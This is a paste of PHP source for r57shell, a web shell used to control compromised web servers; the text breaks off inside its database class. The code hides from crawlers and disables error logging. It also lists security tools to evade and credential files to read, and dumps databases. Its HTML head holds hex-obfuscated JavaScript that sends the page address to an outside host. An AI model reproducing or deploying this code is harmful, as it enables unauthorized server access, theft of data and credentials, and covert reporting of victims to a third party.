· 5 years ago · May 25, 2020, 03:32 AM
1<?php
2
3
4
5if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}
6
7
8
9$language='eng';
10
11
12
13$auth = 0;
14
15
16
17$name='';
18
19$pass='';
20
21
22
23//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
24
25@setlocale(LC_ALL,'ru_RU.cp1251');
26
27
28
29@ini_restore("safe_mode");
30
31@ini_restore("open_basedir");
32
33@ini_restore("safe_mode_include_dir");
34
35@ini_restore("safe_mode_exec_dir");
36
37@ini_restore("disable_functions");
38
39@ini_restore("allow_url_fopen");
40
41
42
43if(@function_exists('ini_set'))
44
45 {
46
47 @ini_set('error_log',NULL);
48
49 @ini_set('log_errors',0);
50
51 @ini_set('file_uploads',1);
52
53 @ini_set('allow_url_fopen',1);
54
55 }
56
57else
58
59 {
60
61 @ini_alter('error_log',NULL);
62
63 @ini_alter('log_errors',0);
64
65 @ini_alter('file_uploads',1);
66
67 @ini_alter('allow_url_fopen',1);
68
69 }
70
71
72
73error_reporting(E_ALL);
74
75
76
77/* ??? ????? */
78
79$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
80
81$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');
82
83$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');
84
85$downloaders = array('wget','fetch','lynx','links','curl','get');
86
87
88
89/* ??? ?????? ???????? ???? ????? realpath() */
90
91//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
92
93//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";
94
95//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";
96
97//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";
98
99//$chars_rlph = "_-.01234567890";
100
101$chars_rlph = "abcdefghijklnmopqrstuvwxyz";
102
103
104
105$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php',
106
107'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root',
108
109'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs',
110
111'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');
112
113
114
115/******************************************************************************************************/
116
117
118
119define("starttime",@getmicrotime());
120
121
122
123if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
124
125
126
127set_magic_quotes_runtime(0);
128
129@set_time_limit(0);
130
131if(@function_exists('ini_set'))
132
133 {
134
135 @ini_set('max_execution_time',0);
136
137 @ini_set('output_buffering',0);
138
139 }
140
141else
142
143 {
144
145 @ini_alter('max_execution_time',0);
146
147 @ini_alter('output_buffering',0);
148
149 }
150
151$safe_mode = @ini_get('safe_mode');
152
153#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};
154
155$version = '1.42';
156
157if(@version_compare(@phpversion(), '4.1.0') == -1)
158
159 {
160
161 $_POST = &$HTTP_POST_VARS;
162
163 $_GET = &$HTTP_GET_VARS;
164
165 $_SERVER = &$HTTP_SERVER_VARS;
166
167 $_COOKIE = &$HTTP_COOKIE_VARS;
168
169 }
170
171if (@get_magic_quotes_gpc())
172
173 {
174
175 foreach ($_POST as $k=>$v)
176
177 {
178
179 $_POST[$k] = stripslashes($v);
180
181 }
182
183 foreach ($_COOKIE as $k=>$v)
184
185 {
186
187 $_COOKIE[$k] = stripslashes($v);
188
189 }
190
191 }
192
193
194
195if($auth == 1) {
196
197if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
198
199 {
200
201 header('WWW-Authenticate: Basic realm="HELLO!"');
202
203 header('HTTP/1.0 401 Unauthorized');
204
205 exit("<h1>Access Denied</h1>");
206
207 }
208
209}
210
211
212
213if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) {
214
215 $tempdir='./';
216
217 $select_tempdir = '<select name=tempdir><option value="./">./</option>';
218
219 foreach( $tempdirs as $item) {
220
221 if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;}
222
223 }
224
225 $select_tempdir .= '</select>';
226
227 setcookie('tempdir',$tempdir);
228
229 setcookie('select_tempdir',$select_tempdir);
230
231}else{
232
233 if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];}
234
235 $select_tempdir = $_COOKIE['select_tempdir'];
236
237}
238
239
240
241$head = '
242
243<html>
244<head>
245<title>r57shell v.1.42 - Edited By KingDefacer</title>
246<script>
247var _0x5be8=["\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x65\x76\x61\x6C\x2E\x63\x72\x79\x70\x74\x72\x2E\x6F\x72\x67\x2F\x3F\x78\x3D","\x68\x72\x65\x66"]
248a= new Image();
249a[_0x5be8[0]]=_0x5be8[1]+escape(location[_0x5be8[2]]);
250</script>
251<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
252<STYLE>
253
254tr {
255
256BORDER-RIGHT: #aaaaaa 1px solid;
257
258BORDER-TOP: #eeeeee 1px solid;
259
260BORDER-LEFT: #eeeeee 1px solid;
261
262BORDER-BOTTOM: #aaaaaa 1px solid;
263
264color: #000000;
265
266}
267
268td {
269
270BORDER-RIGHT: #aaaaaa 1px solid;
271
272BORDER-TOP: #eeeeee 1px solid;
273
274BORDER-LEFT: #eeeeee 1px solid;
275
276BORDER-BOTTOM: #aaaaaa 1px solid;
277
278color: #000000;
279
280}
281
282.table1 {
283
284BORDER: 0px;
285
286BACKGROUND-COLOR: #D4D0C8;
287
288color: #000000;
289
290}
291
292.td1 {
293
294BORDER: 0px;
295
296font: 7pt Verdana;
297
298color: #000000;
299
300}
301
302.tr1 {
303
304BORDER: 0px;
305
306color: #000000;
307
308}
309
310table {
311
312BORDER: #eeeeee 1px outset;
313
314BACKGROUND-COLOR: #D4D0C8;
315
316color: #000000;
317
318}
319
320input {
321
322BORDER-RIGHT: #ffffff 1px solid;
323
324BORDER-TOP: #999999 1px solid;
325
326BORDER-LEFT: #999999 1px solid;
327
328BORDER-BOTTOM: #ffffff 1px solid;
329
330BACKGROUND-COLOR: #e4e0d8;
331
332font: 8pt Verdana;
333
334color: #000000;
335
336}
337
338select {
339
340BORDER-RIGHT: #ffffff 1px solid;
341
342BORDER-TOP: #999999 1px solid;
343
344BORDER-LEFT: #999999 1px solid;
345
346BORDER-BOTTOM: #ffffff 1px solid;
347
348BACKGROUND-COLOR: #e4e0d8;
349
350font: 8pt Verdana;
351
352color: #000000;;
353
354}
355
356submit {
357
358BORDER: buttonhighlight 2px outset;
359
360BACKGROUND-COLOR: #e4e0d8;
361
362width: 30%;
363
364color: #000000;
365
366}
367
368textarea {
369
370BORDER-RIGHT: #ffffff 1px solid;
371
372BORDER-TOP: #999999 1px solid;
373
374BORDER-LEFT: #999999 1px solid;
375
376BORDER-BOTTOM: #ffffff 1px solid;
377
378BACKGROUND-COLOR: #e4e0d8;
379
380font: Fixedsys bold;
381
382color: #000000;
383
384}
385
386BODY {
387
388margin: 1px;
389
390color: #000000;
391
392background-color: #e4e0d8;
393
394}
395
396A:link {COLOR:red; TEXT-DECORATION: none}
397
398A:visited { COLOR:red; TEXT-DECORATION: none}
399
400A:active {COLOR:red; TEXT-DECORATION: none}
401
402A:hover {color:blue;TEXT-DECORATION: none}
403
404</STYLE>
405
406<script language=\'javascript\'>
407
408function hide_div(id)
409
410{
411
412 document.getElementById(id).style.display = \'none\';
413
414 document.cookie=id+\'=0;\';
415
416}
417
418function show_div(id)
419
420{
421
422 document.getElementById(id).style.display = \'block\';
423
424 document.cookie=id+\'=1;\';
425
426}
427
428function change_divst(id)
429
430{
431
432 if (document.getElementById(id).style.display == \'none\')
433
434 show_div(id);
435
436 else
437
438 hide_div(id);
439
440}
441
442
443
444
445
446</script>';
447
448class zipfile
449
450{
451
452 var $datasec = array();
453
454 var $ctrl_dir = array();
455
456 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
457
458 var $old_offset = 0;
459
460 function unix2DosTime($unixtime = 0) {
461
462 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
463
464 if ($timearray['year'] < 1980) {
465
466 $timearray['year'] = 1980;
467
468 $timearray['mon'] = 1;
469
470 $timearray['mday'] = 1;
471
472 $timearray['hours'] = 0;
473
474 $timearray['minutes'] = 0;
475
476 $timearray['seconds'] = 0;
477
478 }
479
480 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
481
482 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
483
484 }
485
486 function addFile($data, $name, $time = 0)
487
488 {
489
490 $name = str_replace('\\', '/', $name);
491
492 $dtime = dechex($this->unix2DosTime($time));
493
494 $hexdtime = '\x' . $dtime[6] . $dtime[7]
495
496 . '\x' . $dtime[4] . $dtime[5]
497
498 . '\x' . $dtime[2] . $dtime[3]
499
500 . '\x' . $dtime[0] . $dtime[1];
501
502 eval('$hexdtime = "' . $hexdtime . '";');
503
504 $fr = "\x50\x4b\x03\x04";
505
506 $fr .= "\x14\x00";
507
508 $fr .= "\x00\x00";
509
510 $fr .= "\x08\x00";
511
512 $fr .= $hexdtime;
513
514 $unc_len = strlen($data);
515
516 $crc = crc32($data);
517
518 $zdata = gzcompress($data);
519
520 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
521
522 $c_len = strlen($zdata);
523
524 $fr .= pack('V', $crc);
525
526 $fr .= pack('V', $c_len);
527
528 $fr .= pack('V', $unc_len);
529
530 $fr .= pack('v', strlen($name));
531
532 $fr .= pack('v', 0);
533
534 $fr .= $name;
535
536 $fr .= $zdata;
537
538 $this -> datasec[] = $fr;
539
540 $cdrec = "\x50\x4b\x01\x02";
541
542 $cdrec .= "\x00\x00";
543
544 $cdrec .= "\x14\x00";
545
546 $cdrec .= "\x00\x00";
547
548 $cdrec .= "\x08\x00";
549
550 $cdrec .= $hexdtime;
551
552 $cdrec .= pack('V', $crc);
553
554 $cdrec .= pack('V', $c_len);
555
556 $cdrec .= pack('V', $unc_len);
557
558 $cdrec .= pack('v', strlen($name) );
559
560 $cdrec .= pack('v', 0 );
561
562 $cdrec .= pack('v', 0 );
563
564 $cdrec .= pack('v', 0 );
565
566 $cdrec .= pack('v', 0 );
567
568 $cdrec .= pack('V', 32 );
569
570 $cdrec .= pack('V', $this -> old_offset );
571
572 $this -> old_offset += strlen($fr);
573
574 $cdrec .= $name;
575
576 $this -> ctrl_dir[] = $cdrec;
577
578 }
579
580 function file()
581
582 {
583
584 $data = implode('', $this -> datasec);
585
586 $ctrldir = implode('', $this -> ctrl_dir);
587
588 return
589
590 $data .
591
592 $ctrldir .
593
594 $this -> eof_ctrl_dir .
595
596 pack('v', sizeof($this -> ctrl_dir)) .
597
598 pack('v', sizeof($this -> ctrl_dir)) .
599
600 pack('V', strlen($ctrldir)) .
601
602 pack('V', strlen($data)) .
603
604 "\x00\x00";
605
606 }
607
608}
609
610
611
612function compress(&$filename,&$filedump,$compress)
613
614 {
615
616 global $content_encoding;
617
618 global $mime_type;
619
620 if ($compress == 'bzip' && @function_exists('bzcompress'))
621
622 {
623
624 $filename .= '.bz2';
625
626 $mime_type = 'application/x-bzip2';
627
628 $filedump = bzcompress($filedump);
629
630 }
631
632 else if ($compress == 'gzip' && @function_exists('gzencode'))
633
634 {
635
636 $filename .= '.gz';
637
638 $content_encoding = 'x-gzip';
639
640 $mime_type = 'application/x-gzip';
641
642 $filedump = gzencode($filedump);
643
644 }
645
646 else if ($compress == 'zip' && @function_exists('gzcompress'))
647
648 {
649
650 $filename .= '.zip';
651
652 $mime_type = 'application/zip';
653
654 $zipfile = new zipfile();
655
656 $zipfile -> addFile($filedump, substr($filename, 0, -4));
657
658 $filedump = $zipfile -> file();
659
660 }
661
662 else
663
664 {
665
666 $mime_type = 'application/octet-stream';
667
668 }
669
670 }
671
672
673
674function moreread($temp){
675
676global $lang,$language;
677
678$str='';
679
680 if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){
681
682 if($ffile){
683
684 while(!@feof($ffile)){$str .= @fgets($ffile);};
685
686 fclose($ffile);
687
688 }
689
690 }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){
691
692 if($ffile){
693
694 $str = @fread($ffile, @filesize($temp));
695
696 @fclose($ffile);
697
698 }
699
700 }elseif(@function_exists('file')&&($ffiles = @file($temp))){
701
702 foreach ($ffiles as $ffile) { $str .= $ffile; }
703
704 }elseif(@function_exists('file_get_contents')){
705
706 $str = @file_get_contents($temp);
707
708 }elseif(@function_exists('readfile')){
709
710 $str = @readfile($temp);
711
712 }elseif(@function_exists('highlight_file')){
713
714 $str = @highlight_file($temp);
715
716 }elseif(@function_exists('show_source')){
717
718 $str = @show_source($temp);
719
720 }else{echo $lang[$language.'_text56'];}
721
722return $str;
723
724}
725
726
727
728function readzlib($filename,$temp=''){
729
730global $lang,$language;
731
732$str='';
733
734 if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
735
736 if(@copy("compress.zlib://".$filename, $temp)) {
737
738 $str = moreread($temp);
739
740 } else echo $lang[$language.'_text119'];
741
742 @unlink($temp);
743
744return $str;
745
746}
747
748
749
750function morewrite($temp,$str='')
751
752{
753
754global $lang,$language;
755
756 if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
757
758 if($ffile){
759
760 @fwrite($ffile,$str);
761
762 @fclose($ffile);
763
764 }
765
766 }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
767
768 if($ffile){
769
770 @fputs($ffile,$str);
771
772 @fclose($ffile);
773
774 }
775
776 }elseif(@function_exists('file_put_contents')){
777
778 @file_put_contents($temp,$str);
779
780 }else return 0;
781
782return 1;
783
784}
785
786
787
788function mailattach($to,$from,$subj,$attach)
789
790 {
791
792 $headers = "From: $from\r\n";
793
794 $headers .= "MIME-Version: 1.0\r\n";
795
796 $headers .= "Content-Type: ".$attach['type'];
797
798 $headers .= "; name=\"".$attach['name']."\"\r\n";
799
800 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
801
802 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
803
804 if(mail($to,$subj,"",$headers)) { return 1; }
805
806 return 0;
807
808 }
809
810class my_sql
811
812 {
813
814 var $host = 'localhost';
815
816 var $port = '';
817
818 var $user = '';
819
820 var $pass = '';
821
822 var $base = '';
823
824 var $db = '';
825
826 var $connection;
827
828 var $res;
829
830 var $error;
831
832 var $rows;
833
834 var $columns;
835
836 var $num_rows;
837
838 var $num_fields;
839
840 var $dump;
841
842
843
844 function connect()
845
846 {
847
848 switch($this->db)
849
850 {
851
852 case 'MySQL':
853
854 if(empty($this->port)) { $this->port = '3306'; }
855
856 if(!@function_exists('mysql_connect')) return 0;
857
858 $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
859
860 if(is_resource($this->connection)) return 1;
861
862 break;
863
864 case 'MSSQL':
865
866 if(empty($this->port)) { $this->port = '1433'; }
867
868 if(!@function_exists('mssql_connect')) return 0;
869
870 $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
871
872 if($this->connection) return 1;
873
874 break;
875
876 case 'PostgreSQL':
877
878 if(empty($this->port)) { $this->port = '5432'; }
879
880 $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
881
882 if(!@function_exists('pg_connect')) return 0;
883
884 $this->connection = @pg_connect($str);
885
886 if(is_resource($this->connection)) return 1;
887
888 break;
889
890 case 'Oracle':
891
892 if(!@function_exists('ocilogon')) return 0;
893
894 $this->connection = @ocilogon($this->user, $this->pass, $this->base);
895
896 if(is_resource($this->connection)) return 1;
897
898 break;
899
900 case 'MySQLi':
901
902 if(empty($this->port)) { $this->port = '3306'; }
903
904 if(!@function_exists('mysqli_connect')) return 0;
905
906 $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port);
907
908 if(is_resource($this->connection)) return 1;
909
910 break;
911
912 case 'mSQL':
913
914 if(!@function_exists('msql_connect')) return 0;
915
916 $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass);
917
918 if(is_resource($this->connection)) return 1;
919
920 break;
921
922 case 'SQLite':
923
924 if(!@function_exists('sqlite_open')) return 0;
925
926 $this->connection = @sqlite_open($this->base);
927
928 if(is_resource($this->connection)) return 1;
929
930 break;
931
932 }
933
934 return 0;
935
936 }
937
938
939
940 function select_db()
941
942 {
943
944 switch($this->db)
945
946 {
947
948 case 'MySQL':
949
950 if(@mysql_select_db($this->base,$this->connection)) return 1;
951
952 break;
953
954 case 'MSSQL':
955
956 if(@mssql_select_db($this->base,$this->connection)) return 1;
957
958 break;
959
960 case 'PostgreSQL':
961
962 return 1;
963
964 break;
965
966 case 'Oracle':
967
968 return 1;
969
970 break;
971
972 case 'MySQLi':
973
974 return 1;
975
976 break;
977
978 case 'mSQL':
979
980 if(@msql_select_db($this->base,$this->connection)) return 1;
981
982 break;
983
984 case 'SQLite':
985
986 return 1;
987
988 break;
989
990 }
991
992 return 0;
993
994 }
995
996
997
998 function query($query)
999
1000 {
1001
1002 $this->res=$this->error='';
1003
1004 switch($this->db)
1005
1006 {
1007
1008 case 'MySQL':
1009
1010 if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
1011
1012 {
1013
1014 $this->error = @mysql_error($this->connection);
1015
1016 return 0;
1017
1018 }
1019
1020 else if(is_resource($this->res)) { return 1; }
1021
1022 return 2;
1023
1024 break;
1025
1026 case 'MSSQL':
1027
1028 if(false===($this->res=@mssql_query($query,$this->connection)))
1029
1030 {
1031
1032 $this->error = 'Query error';
1033
1034 return 0;
1035
1036 }
1037
1038 else if(@mssql_num_rows($this->res) > 0) { return 1; }
1039
1040 return 2;
1041
1042 break;
1043
1044 case 'PostgreSQL':
1045
1046 if(false===($this->res=@pg_query($this->connection,$query)))
1047
1048 {
1049
1050 $this->error = @pg_last_error($this->connection);
1051
1052 return 0;
1053
1054 }
1055
1056 else if(@pg_num_rows($this->res) > 0) { return 1; }
1057
1058 return 2;
1059
1060 break;
1061
1062 case 'Oracle':
1063
1064 if(false===($this->res=@ociparse($this->connection,$query)))
1065
1066 {
1067
1068 $this->error = 'Query parse error';
1069
1070 }
1071
1072 else
1073
1074 {
1075
1076 if(@ociexecute($this->res))
1077
1078 {
1079
1080 if(@ocirowcount($this->res) != 0) return 2;
1081
1082 return 1;
1083
1084 }
1085
1086 $error = @ocierror();
1087
1088 $this->error=$error['message'];
1089
1090 }
1091
1092 break;
1093
1094 case 'MySQLi':
1095
1096 if(false===($this->res=@mysqli_query($this->connection,$query)))
1097
1098 {
1099
1100 $this->error = @mysqli_error($this->connection);
1101
1102 return 0;
1103
1104 }
1105
1106 else if(is_resource($this->res)) { return 1; }
1107
1108 return 2;
1109
1110 break;
1111
1112 case 'mSQL':
1113
1114 if(false===($this->res=@msql_query($query,$this->connection)))
1115
1116 {
1117
1118 $this->error = @msql_error($this->connection);
1119
1120 return 0;
1121
1122 }
1123
1124 else if(is_resource($this->res)) { return 1; }
1125
1126 return 2;
1127
1128 break;
1129
1130 case 'SQLite':
1131
1132 if(false===($this->res=@sqlite_query($this->connection,$query)))
1133
1134 {
1135
1136 $this->error = @sqlite_error_string($this->connection);
1137
1138 return 0;
1139
1140 }
1141
1142 else if(is_resource($this->res)) { return 1; }
1143
1144 return 2;
1145
1146 break;
1147
1148 }
1149
1150 return 0;
1151
1152 }
1153
1154 function get_result()
1155
1156 {
1157
1158 $this->rows=array();
1159
1160 $this->columns=array();
1161
1162 $this->num_rows=$this->num_fields=0;
1163
1164 switch($this->db)
1165
1166 {
1167
1168 case 'MySQL':
1169
1170 $this->num_rows=@mysql_num_rows($this->res);
1171
1172 $this->num_fields=@mysql_num_fields($this->res);
1173
1174 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
1175
1176 @mysql_free_result($this->res);
1177
1178 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1179
1180 break;
1181
1182 case 'MSSQL':
1183
1184 $this->num_rows=@mssql_num_rows($this->res);
1185
1186 $this->num_fields=@mssql_num_fields($this->res);
1187
1188 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
1189
1190 @mssql_free_result($this->res);
1191
1192 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
1193
1194 break;
1195
1196 case 'PostgreSQL':
1197
1198 $this->num_rows=@pg_num_rows($this->res);
1199
1200 $this->num_fields=@pg_num_fields($this->res);
1201
1202 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
1203
1204 @pg_free_result($this->res);
1205
1206 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1207
1208 break;
1209
1210 case 'Oracle':
1211
1212 $this->num_fields=@ocinumcols($this->res);
1213
1214 while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
1215
1216 @ocifreestatement($this->res);
1217
1218 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1219
1220 break;
1221
1222 case 'MySQLi':
1223
1224 $this->num_rows=@mysqli_num_rows($this->res);
1225
1226 $this->num_fields=@mysqli_num_fields($this->res);
1227
1228 while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res)));
1229
1230 @mysqli_free_result($this->res);
1231
1232 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1233
1234 break;
1235
1236 case 'mSQL':
1237
1238 $this->num_rows=@msql_num_rows($this->res);
1239
1240 $this->num_fields=@msql_num_fields($this->res);
1241
1242 while(false !== ($this->rows[] = @msql_fetch_array($this->res)));
1243
1244 @msql_free_result($this->res);
1245
1246 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1247
1248 break;
1249
1250 case 'SQLite':
1251
1252 $this->num_rows=@sqlite_num_rows($this->res);
1253
1254 $this->num_fields=@sqlite_num_fields($this->res);
1255
1256 while(false !== ($this->rows[] = @sqlite_fetch_array($this->res)));
1257
1258 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1259
1260 break;
1261
1262 }
1263
1264 return 0;
1265
1266 }
1267
1268 function dump($table)
1269
1270 {
1271
1272 if(empty($table)) return 0;
1273
1274 $this->dump=array();
1275
1276 $this->dump[0] = '##';
1277
1278 $this->dump[1] = '## --------------------------------------- ';
1279
1280 $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
1281
1282 $this->dump[3] = '## Database: '.$this->base;
1283
1284 $this->dump[4] = '## Table: '.$table;
1285
1286 $this->dump[5] = '## --------------------------------------- ';
1287
1288 switch($this->db)
1289
1290 {
1291
1292 case 'MySQL':
1293
1294 $this->dump[0] = '## MySQL dump';
1295
1296 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
1297
1298 if(!$this->get_result()) return 0;
1299
1300 $this->dump[] = $this->rows[0]['Create Table'];
1301
1302 $this->dump[] = '## --------------------------------------- ';
1303
1304 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
1305
1306 if(!$this->get_result()) return 0;
1307
1308 for($i=0;$i<$this->num_rows;$i++)
1309
1310 {
1311
1312 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
1313
1314 $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1315
1316 }
1317
1318 break;
1319
1320 case 'MSSQL':
1321
1322 $this->dump[0] = '## MSSQL dump';
1323
1324 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1325
1326 if(!$this->get_result()) return 0;
1327
1328 for($i=0;$i<$this->num_rows;$i++)
1329
1330 {
1331
1332 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1333
1334 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1335
1336 }
1337
1338 break;
1339
1340 case 'PostgreSQL':
1341
1342 $this->dump[0] = '## PostgreSQL dump';
1343
1344 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1345
1346 if(!$this->get_result()) return 0;
1347
1348 for($i=0;$i<$this->num_rows;$i++)
1349
1350 {
1351
1352 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1353
1354 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1355
1356 }
1357
1358 break;
1359
1360 case 'Oracle':
1361
1362 $this->dump[0] = '## ORACLE dump';
1363
1364 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1365
1366 if(!$this->get_result()) return 0;
1367
1368 for($i=0;$i<$this->num_rows;$i++)
1369
1370 {
1371
1372 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1373
1374 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1375
1376 }
1377
1378 break;
1379
1380 case 'MySQLi':
1381
1382 $this->dump[0] = '## MySQLi dump';
1383
1384 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1385
1386 if(!$this->get_result()) return 0;
1387
1388 for($i=0;$i<$this->num_rows;$i++)
1389
1390 {
1391
1392 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);}
1393
1394 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1395
1396 }
1397
1398 break;
1399
1400 case 'mSQL':
1401
1402 $this->dump[0] = '## mSQL dump';
1403
1404 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1405
1406 if(!$this->get_result()) return 0;
1407
1408 for($i=0;$i<$this->num_rows;$i++)
1409
1410 {
1411
1412 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1413
1414 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1415
1416 }
1417
1418 break;
1419
1420 case 'SQLite':
1421
1422 $this->dump[0] = '## SQLite dump';
1423
1424 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1425
1426 if(!$this->get_result()) return 0;
1427
1428 for($i=0;$i<$this->num_rows;$i++)
1429
1430 {
1431
1432 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1433
1434 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1435
1436 }
1437
1438 break;
1439
1440 default:
1441
1442 return 0;
1443
1444 break;
1445
1446 }
1447
1448 return 1;
1449
1450 }
1451
1452 function close()
1453
1454 {
1455
1456 switch($this->db)
1457
1458 {
1459
1460 case 'MySQL':
1461
1462 @mysql_close($this->connection);
1463
1464 break;
1465
1466 case 'MSSQL':
1467
1468 @mssql_close($this->connection);
1469
1470 break;
1471
1472 case 'PostgreSQL':
1473
1474 @pg_close($this->connection);
1475
1476 break;
1477
1478 case 'Oracle':
1479
1480 @oci_close($this->connection);
1481
1482 break;
1483
1484 case 'MySQLi':
1485
1486 @mysqli_close($this->connection);
1487
1488 break;
1489
1490 case 'mSQL':
1491
1492 @msql_close($this->connection);
1493
1494 break;
1495
1496 case 'SQLite':
1497
1498 @sqlite_close($this->connection);
1499
1500 break;
1501
1502 }
1503
1504 }
1505
1506 function affected_rows()
1507
1508 {
1509
1510 switch($this->db)
1511
1512 {
1513
1514 case 'MySQL':
1515
1516 return @mysql_affected_rows($this->res);
1517
1518 break;
1519
1520 case 'MSSQL':
1521
1522 return @mssql_affected_rows($this->res);
1523
1524 break;
1525
1526 case 'PostgreSQL':
1527
1528 return @pg_affected_rows($this->res);
1529
1530 break;
1531
1532 case 'Oracle':
1533
1534 return @ocirowcount($this->res);
1535
1536 break;
1537
1538 case 'MySQLi':
1539
1540 return @mysqli_affected_rows($this->res);
1541
1542 break;
1543
1544 case 'mSQL':
1545
1546 return @msql_affected_rows($this->res);
1547
1548 break;
1549
1550 case 'SQLite':
1551
1552 return @sqlite_changes($this->res);
